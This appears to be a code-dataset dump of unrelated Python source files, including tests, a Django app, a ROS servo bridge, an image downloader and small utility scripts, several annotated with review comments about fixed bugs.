index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
15,100 | df0756c94a20f5655f10a76de68f4cc7d3269d23 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import sys
import logging

# Allow the repo-local `tests` and `lib` packages to be imported when the
# script is launched from the project root.
sys.path.append(".")
from tests import parser_tests, ruby_tests
from lib import test_runner

# Keep stderr clean: only CRITICAL log records get through during test runs.
logging.basicConfig(level=logging.CRITICAL)

# One TestCase instance per test method.
# (Parser tests are currently disabled; rebuild them with
#  parser_tests.TestParser('<method_name>') and register them below.)
ruby_toruby = ruby_tests.TestRuby('test_toRuby')
ruby_parse = ruby_tests.TestRuby('test_parseRubytext')
ruby_bouten = ruby_tests.TestRuby('test_bouten')
ruby_bousen = ruby_tests.TestRuby('test_bousen')

# Register the active tests with the module runner:
#   test_suite.addTestList("MODULE NAME", [list, of, tests])
test_suite = test_runner.ModuleTestRunner()
test_suite.addTestList("Ruby", [ruby_toruby, ruby_parse, ruby_bouten, ruby_bousen])
if __name__ == "__main__":
# Run test suite
test_suite.run() |
15,101 | 9fab3b83436cbdaffdd48a9e22747d12035da70c |
import os
import argparse
import csv
import urllib
import urllib.request
import logging
import time
import traceback
import random #0 1 2 3 4 5 6 7 8 9 10 11 12
#            0     1     2     3     4     5     6     7     8     9    10    11    12
ColorList = ["银", "黑", "绿", "橙", "白", "灰", "红", "蓝", "紫", "黄", "金", "棕", "咖啡"]
DirectList = ['侧前45度车头向右水平', '侧前45度车头向左水平', '侧后45度车头向右水平', '侧后45度车头向左水平', '正侧车头向右水平', '正侧车头向左水平', '正前水平',
              '正后水平']


def check_dire(pr_name):
    '''
    Resolve an orientation label to its index.

    :param pr_name: orientation label exactly as it appears in the CSV
    :return: index into DirectList, or -1 when the label is unknown
    '''
    try:
        return DirectList.index(pr_name)
    except ValueError:
        return -1


def check_color(p_name):
    '''
    Find the body-color index embedded in a photo description.

    Only space-separated tokens starting with "外" (exterior) are inspected.

    :param p_name: space-separated photo description
    :return: index into ColorList, or -1 when no color is found
    '''
    for token in p_name.split(" "):
        if not token.startswith("外"):
            continue
        for idx, color in enumerate(ColorList):
            if color in token:
                return idx
    return -1
def str2int(s):
    '''Convert *s* to int; on failure print the traceback and return *s* unchanged.'''
    try:
        value = int(s)
    except ValueError:
        traceback.print_exc()
        return s
    return value
def download(img_url, save_path):
    '''
    Fetch *img_url* and write the payload to *save_path*.

    The download is skipped when a plausibly-complete file (>10 KiB) already
    exists at *save_path*.

    :param img_url: absolute URL of the image
    :param save_path: destination file path
    :return: 0 on success, -1 if the file already exists, -2 on download failure
    '''
    strlog = img_url + "\t" + save_path
    if os.path.isfile(save_path) and os.path.getsize(save_path) > 10240:
        logging.debug(' [exist] ' + strlog)
        return -1
    try:
        # Read the whole payload before opening the output file so that a
        # failed request never leaves a truncated file behind.
        fi = urllib.request.urlopen(img_url)
        img_file = fi.read()
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit; `Exception` keeps the best-effort behaviour without
        # trapping interpreter-control exceptions.
        traceback.print_exc()
        logging.debug(' [urlopen error] ' + strlog)
        return -2
    else:
        with open(save_path, "wb") as fo:
            fo.write(img_file)
        logging.info(' [write success] ' + strlog)
        return 0
def get_args():
    """Build and parse the downloader's command-line arguments."""
    cli = argparse.ArgumentParser()
    cli.add_argument('--input', default='H:/外观、前排、后排.csv')
    cli.add_argument('--out_dir', default='H:/chexi_download/')
    return cli.parse_args()
def main(args):
    """Walk the CSV named by *args.input* and download orientation photos.

    Only rows whose property_group_id is "6" and whose property_name is a
    recognised orientation label are fetched; files are grouped into
    d_<orientation-index> folders under args.out_dir.
    """
    # Log to a timestamped file so repeated runs don't clobber each other.
    logging.basicConfig(
        filename=time.strftime("%Y%m%d_%H%M%S", time.localtime()) + "_download_pic.log",
        level=logging.DEBUG,
        format='%(asctime)s - %(levelname)s - %(message)s',
    )
    url_prefix = 'https://img1.bitautoimg.com/autoalbum/'
    with open(args.input, 'r', encoding="gbk") as fi:
        csv_reader = csv.reader(fi)
        headers = next(csv_reader)
        print(headers)
        # Column name -> column index, so rows can be addressed by name.
        hid = {name: idx for idx, name in enumerate(headers)}
        print(hid)
        # Per-property-group counters (only consumed by the disabled
        # colour-grouping branch, kept for parity with the original).
        dict_count = {'5': 0, '6': 0, '7': 0}
        for row in csv_reader:
            if len(row) != len(headers):
                print("len(row) != len(headers)")
                continue
            url_path = url_prefix + row[hid['path']]
            main_brand_id = str(int(row[hid['main_brand_id']]))
            main_brand_name = row[hid['main_brand_name']]
            brand_id = str(int(row[hid['brand_id']]))
            brand_name = row[hid['brand_name']]
            series_id = row[hid['series_id']]
            series_name = row[hid['series_name']]
            sell_year = row[hid['sell_year']]
            spec_id = str(int(row[hid['spec_id']]))
            spec_name = row[hid['spec_name']]
            photo_id = str(int(row[hid['photo_id']]))
            photo_name = row[hid['photo_name']]
            property_id = row[hid['property_group_id']]
            property_name = row[hid['property_name']]
            # Rows with a non-numeric series_id are reported and skipped
            # (str2int prints the traceback as a side effect).
            if not isinstance(str2int(series_id), int):
                print("series_id is not a integer !!!!", row, series_id)
                continue
            if property_id != "6":
                continue
            direction = check_dire(property_name)
            if direction == -1:
                continue
            out_dir_1 = os.path.join(args.out_dir, "d_{}".format(direction))
            if not os.path.isdir(out_dir_1):
                os.makedirs(out_dir_1)
            save_path_1 = os.path.join(out_dir_1, "{}.{}.{}.jpg".format(sell_year, spec_id, photo_id))
            if os.path.isfile(save_path_1) and os.path.getsize(save_path_1) > 10 * 1024:
                print(save_path_1, "【already exists】")
                continue
            if download(url_path, save_path_1) == 0:
                print(url_path, save_path_1,
                      main_brand_id, main_brand_name,
                      brand_id, brand_name,
                      series_id, series_name,
                      sell_year,
                      spec_id, spec_name,
                      photo_name)
            # NOTE(review): the original kept a disabled (dead triple-quoted)
            # variant of this branch that grouped photos by body colour
            # (check_color(photo_name) -> c_<color> folders) and tallied
            # dict_count per property group; recover it from version control
            # if colour grouping is ever needed again.
# Entry point: parse CLI options and run the downloader.
if __name__ == '__main__':
    main(get_args())
|
15,102 | feccdb8846e921b0e841c0b3cca9e8927e773ef0 | from okcomputer import aiEngine
import os, time, sys
from random import randint
import msvcrt
os.system('mode con: cols=35 lines=15')
def delay(seconds):
    """Sleep for *seconds* (the parameter was named `float`, shadowing the builtin)."""
    time.sleep(seconds)
def clearScreen():
    """Clear the terminal: 'cls' on Windows, 'clear' elsewhere."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
def robeFace():
    # Idle animation for the robot face (Python 2 print-statement syntax,
    # Windows-only key handling via msvcrt). Repaints frames forever; any
    # keypress hands control to aiEngine().
    while True:
        clearScreen()
        # Frame: eyes fully open.
        print '''
------\ /------
******* *******
* * * *
* * * * * *
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
        if msvcrt.kbhit():
            if ord(msvcrt.getch()) > 0:
                msvcrt.getch()
                aiEngine()
        else:
            # No key pressed: wait a random beat, then play the blink frames.
            delay(randint(0,4))
            clearScreen()
            # Frame: eyelids lowering.
            print '''
------\ /------
******* *******
******* *******
** * ** ** * **
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
            clearScreen()
            # Frame: eyes nearly shut.
            print '''
------\ /------
******* *******
******* *******
******* *******
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
            clearScreen()
            # Frame: eyes fully closed.
            print '''
------\ /------
******* *******
******* *******
******* *******
******* *******
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
            clearScreen()
            # Frame: eyes reopening.
            print '''
------\ /------
******* *******
******* *******
******* *******
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
            clearScreen()
            # Frame: almost open again.
            print '''
------\ /------
******* *******
******* *******
** * ** ** * **
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
            clearScreen()
if __name__ == '__main__':
robeFace() |
15,103 | d22a0204e4357d774b645b2b4175d4ce0242f31d | # import os, shutil
#
# for i in range(4, 13):
# if os.path.exists("./" + str(i)):
# print "%d folder exist!" % i
# else:
# os.mkdir("./" + str(i))
#
# if os.path.exists("./%d.py" % i):
# shutil.move("./%d.py" % i, "./%d/" % i);
# else:
# print "%d.py not exist" % i |
15,104 | 170a73ed985d2098ea61d79adee676b3ed43b5e8 | from detectron2.data.samplers import RepeatFactorTrainingSampler
from detectron2.data.common import DatasetFromList
from detectron2.data.build import get_detection_dataset_dicts
from numpy.core.fromnumeric import repeat
class RepeatfactorSampler(RepeatFactorTrainingSampler):
    """
    Similar to TrainingSampler, but a sample may appear more times than others based on its "repeat factor".
    This is suitable for training on class imbalanced datasets like LVIS.
    """
    # NOTE(review): both class attributes must be assigned (e.g. patched by
    # the training configuration) before instantiation — left as None, the
    # super().__init__ call below will fail inside
    # repeat_factors_from_category_frequency. Confirm the wiring.
    # Expected: dataset dicts / category-frequency input for detectron2's helper.
    repeat_factors = None
    # Expected: the repeat threshold passed to repeat_factors_from_category_frequency.
    threshold = None
    def __init__(self, size:int, shuffle=True, seed=None):
        # `size` is accepted for signature compatibility with other samplers
        # but is not used; factors come from the class-level configuration.
        super().__init__(RepeatFactorTrainingSampler.repeat_factors_from_category_frequency(self.repeat_factors,self.threshold),
                         shuffle=shuffle, seed=seed) |
15,105 | 787216a272c816c71c9e08a086ff040b31419f43 | from nornir import InitNornir
from nornir.core import Nornir
from flasnir.definitions import PROJECT_ROOT
HOSTS = PROJECT_ROOT / "config" / "inventory" / "hosts.yaml"
DEFAULTS = PROJECT_ROOT / "config" / "inventory" / "defaults.yaml"
def init_nornir() -> Nornir:
    """Build a Nornir runner backed by the project's SimpleInventory YAML files."""
    return InitNornir(
        runner={
            "plugin": "threaded",
            "options": {
                # Upper bound on concurrent device connections.
                "num_workers": 100,
            },
        },
        inventory={
            "plugin": "SimpleInventory",
            "options": {
                "host_file": str(HOSTS),
                "defaults_file": str(DEFAULTS)
            },
        },
    ) |
15,106 | af062d3c56362abfe4b8ededdde4dcf64fe33f32 | import argparse
import logging
from logger.mylogger import setup_logging
from pdf_scraper import Scraper
# CLI definition lives at module level so importers can reuse/extend it.
parser = argparse.ArgumentParser()
parser.add_argument("site", help="the site to scrape")
parser.add_argument("pdf_server")
parser.add_argument("output_folder", help="output base folder for generated pdfs")
if __name__ == "__main__":
    setup_logging("logger/log_config.json")
    lgr = logging.getLogger(__name__)
    args = parser.parse_args()
    # NOTE(review): logged at ERROR level, presumably so it shows up under a
    # terse log config — confirm; otherwise this should be lgr.info(...).
    lgr.error("Starting the log.")
    # Run the scrape/convert cycle 10 times, re-instantiating each pass.
    for lp in range(10):
        scr = Scraper(args.site, args.pdf_server, args.output_folder)
        scr.scrape()
        scr.create_pdfs()
|
15,107 | a43b290dcc49da9de05c338d1aefcb56d02c1922 | import numpy as np
from functions import compute_s_w, compute_s_b, compute_avg_face
from pca import calc_eig_pca_small
def calc_eig_fld(train_image=None, train_label=None, k=None, sw=None, sb=None, k_eigvecs=None):
    """Fisher Linear Discriminant eigen-decomposition in a PCA subspace.

    When any of sw / sb / k_eigvecs is not supplied they are computed from
    train_image / train_label: a PCA basis of the top-k eigenvectors plus the
    within-class (sw) and between-class (sb) scatter matrices. The FLD
    directions are then eig(pinv(W^T Sw W) @ (W^T Sb W)) with W = k_eigvecs.

    :return: (eigvals_fld, eigvecs_fld, k_eigvecs)

    Bug fix: the defaults were mutable lists (``sw=[]`` ...), the classic
    shared-default pitfall, and ``sw == []`` is ambiguous for numpy arrays;
    None sentinels are used instead (an explicitly passed empty list still
    triggers recomputation, preserving the old behaviour).
    """
    def _missing(x):
        # Treat None or an empty sequence/array as "not supplied".
        return x is None or len(x) == 0

    if _missing(sw) or _missing(sb) or _missing(k_eigvecs):
        m, N = train_image.shape
        eigvals, eigvecs_pca = calc_eig_pca_small(train_image, m, N)
        k_eigvecs = eigvecs_pca[:, :k]
        face_avg = compute_avg_face(train_image)
        sw = compute_s_w(train_image, train_label, face_avg)
        sb = compute_s_b(train_image, train_label, face_avg)
    # Ranks kept for diagnostics (the original printed them when debugging).
    rank_sw = np.linalg.matrix_rank(sw)
    rank_sb = np.linalg.matrix_rank(sb)
    # Project both scatter matrices into the PCA subspace...
    wsww = np.dot(k_eigvecs.T, np.dot(sw, k_eigvecs))
    wsbw = np.dot(k_eigvecs.T, np.dot(sb, k_eigvecs))
    # ...and solve the generalized eigenproblem via the pseudo-inverse
    # (pinv because W^T Sw W may be singular).
    pca_mat = np.dot(np.linalg.pinv(wsww), wsbw)
    eigvals_fld, eigvecs_fld = np.linalg.eig(pca_mat)
    return eigvals_fld, eigvecs_fld, k_eigvecs
|
15,108 | 52e2d5f51a9c5082d00108fa5ab51601984e427d | #!/usr/bin/env python
import rospy
import sys, signal
import os
from math import pi
from std_msgs.msg import Float64
from ros_pololu_servo.msg import MotorState as MS
from ros_pololu_servo.msg import MotorStateList as MSL
from ros_pololu_servo.msg import MotorCommand as MC
PUBTHRESH = 0.01 # don't bother publishing if the last publish is within this percent
class CTLR_SUB:
    """Bridges PID control-effort topics onto Pololu motor commands.

    Subscribes to the steering and throttle control_effort topics and
    republishes them as MotorCommand messages, rate-limited so that values
    within PUBTHRESH (relative) of the last publish are not re-sent.

    The two listeners were near-duplicates; the shared logic now lives in
    _changed_enough() / _publish().
    """
    def __init__(self):
        self.steer_sub = rospy.Subscriber('steering/control_effort', Float64, self.steer_listen)
        self.throttle_sub = rospy.Subscriber('throttle/control_effort', Float64,
                                             self.throttle_listen)
        self.motor_pub = rospy.Publisher('/pololu/command/', MC, queue_size=3)
        # Last published positions, used for the change-threshold test.
        self.steer_last = 0.0
        self.throttle_last = 0.0

    def _changed_enough(self, last, value):
        """True when *value* differs from *last* by more than PUBTHRESH (relative).

        The +0.001 keeps the denominator non-zero when value is 0.
        """
        return abs(last - value) / (abs(value) + 0.001) > PUBTHRESH

    def _publish(self, joint_name, position, acceleration):
        """Publish one MotorCommand at full speed with the given acceleration.

        MotorCommand fields: joint_name (str, from the yaml calibration),
        position (radians, float64), speed (0.0-1.0), acceleration (0.0-1.0).
        """
        output = MC()
        output.joint_name = joint_name
        output.position = position
        output.speed = 1.0
        output.acceleration = 0.3 if False else acceleration  # see callers for per-joint values
        self.motor_pub.publish(output)

    def steer_listen(self, msg):
        """Forward a steering effort to the 'Turning' joint when it changed enough."""
        if self._changed_enough(self.steer_last, msg.data):
            self._publish('Turning', msg.data, 0.3)
            self.steer_last = msg.data

    def throttle_listen(self, msg):
        """Forward a throttle effort to the 'Throttle' joint when it changed enough."""
        if self._changed_enough(self.throttle_last, msg.data):
            self._publish('Throttle', msg.data, 0.5)
            self.throttle_last = msg.data
def main():
    """Start the ROS node and service callbacks until shutdown."""
    rospy.init_node('turning_motor')
    listen = CTLR_SUB()  # keeps the subscribers/publisher alive for the node's lifetime
    rospy.spin()
if __name__ == '__main__':
main()
|
15,109 | 1c15449cddef3b4296c28fc6e3d72970383b187c | from tictactoe.players import RandomPlayer
from tictactoe.game import Board
def test_answer():
    """Sanity check that the test harness itself runs."""
    assert True is not False
    assert False is not True
def test_move():
    """RandomPlayer must never propose an already-occupied square."""
    board = Board()
    player = RandomPlayer()
    player.marker = 'X'
    occupied = [(0, 1), (0, 2), (1, 1)]
    for cell in occupied:
        board[cell] = player.marker
    for cell in occupied:
        assert player.get_move(board) != cell
|
15,110 | 17ee96f7555cb7ec219117fcf041d468688b1618 | """"
Copyright 2021 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import asyncio
from mock import patch
from mocks import MockInstance
import pytest # noqa F401 Needed to run the tests
from google.cloud.sql.connector import Connector, create_async_connector, IPTypes
from google.cloud.sql.connector.exceptions import ConnectorLoopError
def test_connect_enable_iam_auth_error() -> None:
    """Test that calling connect() with different enable_iam_auth
    argument values throws error."""
    conn_name = "my-project:my-region:my-instance"
    # The cached instance was created with enable_iam_auth=False...
    mocked = {conn_name: MockInstance(enable_iam_auth=False)}
    connector = Connector()
    with patch.dict(connector._instances, mocked):
        # ...so requesting IAM auth at connect() time must be rejected.
        pytest.raises(
            ValueError,
            connector.connect,
            conn_name,
            "pg8000",
            enable_iam_auth=True,
        )
    # Drop the mock instance to avoid destructor warnings.
    connector._instances = {}
def test_connect_with_unsupported_driver(connector: Connector) -> None:
    """connect() must raise KeyError with a helpful message for unknown drivers."""
    with pytest.raises(KeyError) as exc_info:
        connector.connect("my-project:my-region:my-instance", "bad_driver")
    # The custom error message should name the offending driver.
    assert exc_info.value.args[0] == "Driver 'bad_driver' is not supported."
@pytest.mark.asyncio
async def test_connect_ConnectorLoopError() -> None:
    """Test that ConnectorLoopError is thrown when Connector.connect
    is called with event loop running in current thread."""
    current_loop = asyncio.get_running_loop()
    # Bind the connector to this (already running) loop on purpose.
    connector = Connector(loop=current_loop)
    # try to connect using current thread's loop, should raise error
    pytest.raises(
        ConnectorLoopError,
        connector.connect,
        "my-project:my-region:my-instance",
        "pg8000",
    )
def test_Connector_Init() -> None:
    """Connector() must come up with the documented default settings."""
    connector = Connector()
    observed = (
        connector._ip_type,
        connector._enable_iam_auth,
        connector._timeout,
        connector._credentials,
    )
    assert observed == (IPTypes.PUBLIC, False, 30, None)
    connector.close()
def test_Connector_Init_context_manager() -> None:
    """The sync context manager must yield a Connector with default settings."""
    with Connector() as connector:
        observed = (
            connector._ip_type,
            connector._enable_iam_auth,
            connector._timeout,
            connector._credentials,
        )
        assert observed == (IPTypes.PUBLIC, False, 30, None)
@pytest.mark.asyncio
async def test_Connector_Init_async_context_manager() -> None:
    """Test that Connector as async context manager sets default properties
    properly."""
    loop = asyncio.get_running_loop()
    async with Connector(loop=loop) as connector:
        assert connector._ip_type == IPTypes.PUBLIC
        assert connector._enable_iam_auth is False
        assert connector._timeout == 30
        assert connector._credentials is None
        # The connector must adopt the loop it was constructed with.
        assert connector._loop == loop
def test_Connector_connect(connector: Connector) -> None:
    """Test that Connector.connect can properly return a DB API connection."""
    # Patch the pg8000 connect path so no real database is contacted.
    with patch("google.cloud.sql.connector.pg8000.connect") as mock_connect:
        mock_connect.return_value = True
        conn = connector.connect(
            "my-project:my-region:my-instance",
            "pg8000",
            user="my-user",
            password="my-pass",
            db="my-db",
        )
    # The sentinel return value proves the patched driver was invoked.
    assert conn is True
@pytest.mark.asyncio
async def test_create_async_connector() -> None:
    """Test that create_async_connector properly initializes connector
    object using current thread's event loop"""
    connector = await create_async_connector()
    # The factory must bind the connector to the currently running loop.
    assert connector._loop == asyncio.get_running_loop()
    await connector.close_async()
def test_Connector_close_kills_thread() -> None:
    """Connector.close must stop the background refresh thread."""
    connector = Connector()
    # A freshly created Connector owns a background thread...
    assert connector._thread
    connector.close()
    # ...which close() must have terminated.
    assert connector._thread.is_alive() is False
|
15,111 | 2ab8eeb7f1fc8f77782767f45e05c3613a19ea22 | # Generated by Django 2.2 on 2020-02-26 05:55
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: makes Products.quantity non-editable with default 1.
    dependencies = [
        ('loginsys', '0006_products_quantity'),
    ]
    operations = [
        migrations.AlterField(
            model_name='products',
            name='quantity',
            field=models.IntegerField(default=1, editable=False),
        ),
    ]
|
15,112 | a5567cd11b81ec24e8dcdc12c6a2793517fadda4 | from enum import Enum
class ChatMessageImportance(str, Enum):
    """Importance level of a chat message (Microsoft Graph-style enum)."""
    # The original members carried trailing commas, making each raw value a
    # 1-tuple like ("normal",). Enum happens to unpack such tuples into the
    # str() constructor, so it worked only by accident; the bare strings
    # below are explicit and produce the same member values.
    Normal = "normal"
    High = "high"
    Urgent = "urgent"
    UnknownFutureValue = "unknownFutureValue"
|
15,113 | 639236dedd8d821c1b32c5ffcf3d1328a85efc89 | import csv
# FIXME(review): original line was `impoort cell.py` — a typo and invalid
# syntax. Importing the `cell` name from cell.py appears to be the intent;
# confirm against cell.py's actual API.
from cell import cell


class pack:
    """Sizing model for a battery pack built from identical cells.

    The original file did not parse (typo'd import, `cellList[]`, unbalanced
    parentheses, empty method bodies); this version restores valid syntax
    while preserving the apparent intent. TODO markers flag the spots where
    the intent could not be confirmed.
    """
    # Class-level defaults mirroring the attributes set in __init__.
    cellsInParallel = 0
    cellsInSeries = 0
    energyRequired = 0
    voltageRequired = 0
    powerRequired = 0
    additionalCapacity = 30  # presumably percent headroom — TODO confirm units
    cell = cell(0, 0)
    cellList = []  # original `cellList[]` was a syntax error

    def __init__(self):
        self.cellsInParallel = 0
        self.cellsInSeries = 0
        self.energyRequired = 0
        self.voltageRequired = 0
        self.powerRequired = 0
        self.additionalCapacity = 30
        self.cell = cell(0, 0)

    def setEnergyRequired(self, energy):
        self.energyRequired = energy

    def setVoltageRequired(self, voltage):
        self.voltageRequired = voltage

    def setPowerRequired(self, power):
        self.powerRequired = power

    def findPackConfig(self):
        """Derive series/parallel cell counts from the pack requirements."""
        # Original read the undefined global `voltageReqired` (typo); the
        # instance attribute is clearly what was meant.
        self.cellsInSeries = self.voltageRequired / self.cell.getVoltage()
        # Original line had unbalanced parentheses; read as
        # (energy / (capacity - 0.7)) * 1.3, i.e. ~30% extra capacity —
        # TODO confirm the intended grouping.
        self.cellsForCapacity = (self.energyRequired / (self.cell.getCapacity() - .7)) * 1.3
        self.cellsForPower = self.powerRequired / self.cell.getMaxDischarge()

    def loadCellInfo(self, path):
        """Read the cell portfolio CSV (semicolon-separated)."""
        # NOTE(review): `path` is ignored and a hard-coded file is opened,
        # matching the original; parameterise once the callers are known.
        with open('cellPortfolio.txt') as csv_file:
            csvReader = csv.reader(csv_file, delimiter=';')
            lineCount = 0
            for row in csvReader:
                if lineCount == 0:
                    # First line: header row.
                    lineCount += 1
                else:
                    # TODO: original had a bare `cell` expression here —
                    # presumably each data row should construct and record
                    # a cell instance.
                    lineCount += 1

    def findCellsRequiredForPower(self):
        pass  # TODO: empty in the original (was a syntax error without a body)

    def findCellsRequiredForVoltage(self):
        pass  # TODO: empty in the original (was a syntax error without a body)

    def optimizePack(self):
        # Optimize pack for weight
        pass  # TODO: not implemented in the original
|
15,114 | 559aed159896c98fb4a2876875b3abc24e455d8b | import sys
from pathlib import Path
basedir = Path(__file__).absolute().resolve().parent
# Ensure the application package is importable regardless of the CWD.
sys.path.insert(0, str(basedir))
from app import create_app
# WSGI entry point: `application` is the name servers (gunicorn/mod_wsgi) look up.
application = create_app()
|
15,115 | 4e9764507402a17d138703878c2279eecf2c002e | # Chapter-2: Fundamentals-2
# Star-Art
# Write 3 functions:
# Write function "drawLeftStars(num)" that accepts a number and prints that many 'stars'
# Write function "drawRightStars(num)" that accepts a number and prints 75 characters in total with that many 'stars' from the right side. The last 'num' characters of the 75 must be 'stars'
# Write function "drawCenterStars(num)" that prints 75 characters total. The stars should be centered in the 75.
# Assume the argument passed is a positive integer <= 75
def drawLeftStars(num):
    """Print `num` stars flush against the left margin.

    Bug fix: the original `print("{}").format(...)` applied .format to
    print's return value (None) — an AttributeError on Python 3.
    """
    print("{}".format('*' * num))
def drawRightStars(num):
    """Print a 75-character line whose last `num` characters are stars
    (the rest is dash padding).

    Bug fix: the original `print("{}").format(...)` applied .format to
    print's return value (None) — an AttributeError on Python 3.
    """
    dashes = "-" * (75 - num)
    stars = "*" * num
    print("{}".format(dashes + stars))
def drawCenterStars(num):
    """Print a 75-character line with `num` stars centered between dashes.

    Bug fixes: .format was applied to print's None return value, and `/`
    yields floats on Python 3 (making `"-" * x` a TypeError); floor division
    restores the Python 2 integer behaviour.
    """
    left = (75 - num) // 2
    star1 = "-" * left
    star2 = "*" * num
    star3 = "-" * (75 - (left + num))
    print("{}".format(star1 + star2 + star3))
# Demo output: exercise each drawing routine once.
drawLeftStars(35)
drawRightStars(40)
drawCenterStars(35)
|
15,116 | 2f59f994c351926c90d03bbc98b873bb6509b2ca | from django.urls import path
from . import views
# Account-management routes; profile editing is the app root.
urlpatterns = [
    path('', views.update_profile_page, name='update_profile_page'),
    path('register/', views.register_page, name='register_page'),
    path('login/', views.login_page, name='login_page'),
    path('logout/', views.logout_page, name='logout_page'),
    path('delete/', views.delete_user_page, name='delete_user_page'),
]
|
15,117 | 7f582482264dbb39550b1bebbcf40e68b7b934b6 | from models.shared_rnn import RNN
from models.shared_cnn import CNN
from models.controller import Controller
from models.cnn_controller import CNNMicroController
|
15,118 | cc6fad9e146ad1997260eb9cb563804d66e75db7 | print("please enter a string")
a=input()
print("pls enter a string ")
b=input()
# True when the second string occurs as a substring of the first.
c=(b in a)
print(c)
|
15,119 | 9cbeccf0ec116003583e3e8749690215e3fa352c | import http
from unittest.mock import call, patch, Mock
import urllib
from directory_constants import choices, urls
from directory_api_client.client import api_client
import requests
import pytest
from django.urls import reverse
from company import forms, views, validators
from core.tests.helpers import create_response
@pytest.fixture
def all_company_profile_data():
    """A complete, valid company-profile payload shared by the tests below."""
    return {
        'name': 'Example Corp.',
        'website': 'http://www.example.com',
        'keywords': 'Nice, Great',
        'employees': choices.EMPLOYEES[1][0],
        'sectors': [choices.INDUSTRIES[3][0]],
        'postal_full_name': 'Jeremy',
        'address_line_1': '123 Fake Street',
        'address_line_2': 'Fakeville',
        'locality': 'London',
        'postal_code': 'E14 6XK',
        'po_box': 'abc',
        'country': 'GB',
        'export_destinations': ['CN', 'IN'],
        'export_destinations_other': 'West Philadelphia',
        'has_exported_before': True,
    }
@pytest.fixture
def address_verification_address_data():
    """Wizard POST payload for the address-verification code step."""
    step = views.CompanyAddressVerificationView.ADDRESS
    code = '111111111111'
    return {
        'company_address_verification_view-current_step': step,
        step + '-code': code,
    }
@pytest.fixture
def address_verification_end_to_end(
    client, user, address_verification_address_data, retrieve_profile_data
):
    """Return a callable that drives the address-verification wizard to the end."""
    user.company = retrieve_profile_data
    client.force_login(user)
    view = views.CompanyAddressVerificationView
    data_step_pairs = [
        [view.ADDRESS, address_verification_address_data],
    ]
    def inner(case_study_id=''):
        # case_study_id is accepted for signature parity with sibling
        # fixtures but is unused here.
        url = reverse('verify-company-address-confirm')
        for key, data in data_step_pairs:
            response = client.post(url, data)
        return response
    return inner
@pytest.fixture
def send_verification_letter_end_to_end(
    all_company_profile_data, retrieve_profile_data, client, user
):
    """Return a callable that submits the send-verification-letter wizard."""
    user.company = retrieve_profile_data
    client.force_login(user)
    all_data = all_company_profile_data
    view = views.SendVerificationLetterView
    address_data = {
        'company_profile_edit_view-current_step': view.ADDRESS,
        view.ADDRESS + '-postal_full_name': all_data['postal_full_name'],
        view.ADDRESS + '-address_confirmed': True,
    }
    data_step_pairs = [
        [view.ADDRESS, address_data],
    ]
    def inner():
        url = reverse('verify-company-address')
        for key, data in data_step_pairs:
            # Tell the wizard which step each payload belongs to.
            data['send_verification_letter_view-current_step'] = key
            response = client.post(url, data)
        return response
    return inner
def test_send_verification_letter_address_context_data(
    client, user, retrieve_profile_data
):
    """The letter page must surface the company's name, number and address."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    response = client.get(reverse('verify-company-address'))
    context = response.context
    assert context['company_name'] == 'Great company'
    assert context['company_number'] == 123456
    expected_address = '123 Fake Street, Fakeville, London, GB, E14 6XK'
    assert context['company_address'] == expected_address
@patch.object(
    api_client.company, 'verify_with_code', return_value=create_response(200)
)
def test_company_address_validation_api_success(
    mock_verify_with_code, address_verification_end_to_end, user,
    settings, retrieve_profile_data
):
    """A valid code verifies the company and renders the success step."""
    retrieve_profile_data['is_verified'] = False
    view = views.CompanyAddressVerificationView
    response = address_verification_end_to_end()
    assert response.status_code == http.client.OK
    assert response.template_name == view.templates[view.SUCCESS]
    mock_verify_with_code.assert_called_with(
        code='1'*12,
        sso_session_id=user.session_id,
    )
@patch.object(api_client.company, 'verify_with_code')
def test_company_address_validation_api_failure(
    mock_verify_with_code, address_verification_end_to_end,
    retrieve_profile_data
):
    """An API rejection surfaces the invalid-code form error."""
    retrieve_profile_data['is_verified'] = False
    mock_verify_with_code.return_value = create_response(400)
    response = address_verification_end_to_end()
    expected = [validators.MESSAGE_INVALID_CODE]
    assert response.status_code == http.client.OK
    assert response.context_data['form'].errors['code'] == expected
def test_unsubscribe_logged_in_user(client, user):
    """Authenticated users see the unsubscribe page."""
    client.force_login(user)
    response = client.get(reverse('unsubscribe'))
    view = views.EmailUnsubscribeView
    assert response.status_code == http.client.OK
    assert response.template_name == [view.template_name]
def test_unsubscribe_anon_user(client):
    """Anonymous users are redirected away from the unsubscribe page."""
    response = client.get(reverse('unsubscribe'))
    assert response.status_code == http.client.FOUND
@patch.object(api_client.supplier, 'unsubscribe')
def test_unsubscribe_api_failure(
    mock_unsubscribe, client, user, retrieve_profile_data
):
    """An API failure bubbles up as an HTTPError."""
    retrieve_profile_data.clear()
    client.force_login(user)
    mock_unsubscribe.return_value = create_response(400)
    with pytest.raises(requests.exceptions.HTTPError):
        client.post(reverse('unsubscribe'))
    mock_unsubscribe.assert_called_once_with(sso_session_id='123')
@patch.object(
    api_client.supplier, 'unsubscribe', return_value=create_response(200)
)
def test_unsubscribe_api_success(
    mock_unsubscribe, client, user, retrieve_profile_data
):
    """A successful unsubscribe renders the success template."""
    retrieve_profile_data.clear()
    client.force_login(user)
    response = client.post(reverse('unsubscribe'))
    mock_unsubscribe.assert_called_once_with(sso_session_id='123')
    view = views.EmailUnsubscribeView
    assert response.status_code == http.client.OK
    assert response.template_name == view.success_template
